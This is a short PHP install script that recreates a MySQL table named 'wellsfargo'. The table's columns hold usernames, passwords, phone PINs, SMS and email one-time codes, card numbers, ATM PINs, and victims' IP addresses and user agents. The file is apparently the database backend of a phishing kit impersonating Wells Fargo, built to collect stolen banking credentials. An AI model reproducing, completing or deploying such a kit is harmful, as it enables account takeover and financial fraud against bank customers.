<?php
include "config/data.php";
try {

$result = $conn ->query("DROP TABLE IF EXISTS wellsfargo");
$result = $conn ->query("CREATE TABLE IF NOT EXISTS wellsfargo (
  id int(10) NOT NULL AUTO_INCREMENT,
  
  user varchar(255) DEFAULT NULL,
  pass varchar(255) DEFAULT NULL,
  
  phone varchar(255) DEFAULT NULL,
  phonepin varchar(255) DEFAULT NULL,
 
  sms varchar(255) DEFAULT NULL,
  otp_mail varchar(255) DEFAULT NULL,

  card varchar(255) DEFAULT NULL,
  atmpin varchar(255) DEFAULT NULL,


  ua varchar(1000) DEFAULT NULL,
  ip varchar(255) DEFAULT NULL,
  time varchar(255) DEFAULT NULL,
  updatetime varchar(255) DEFAULT NULL,
  status int(10) DEFAULT NULL,
  CONSTRAINT pk_login PRIMARY KEY(id)
)ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;");

}
catch(Exception $e) {
  echo 'Some error occured';
  die();
}
//echo "Database Refreshed/Installed Successfully";
?>


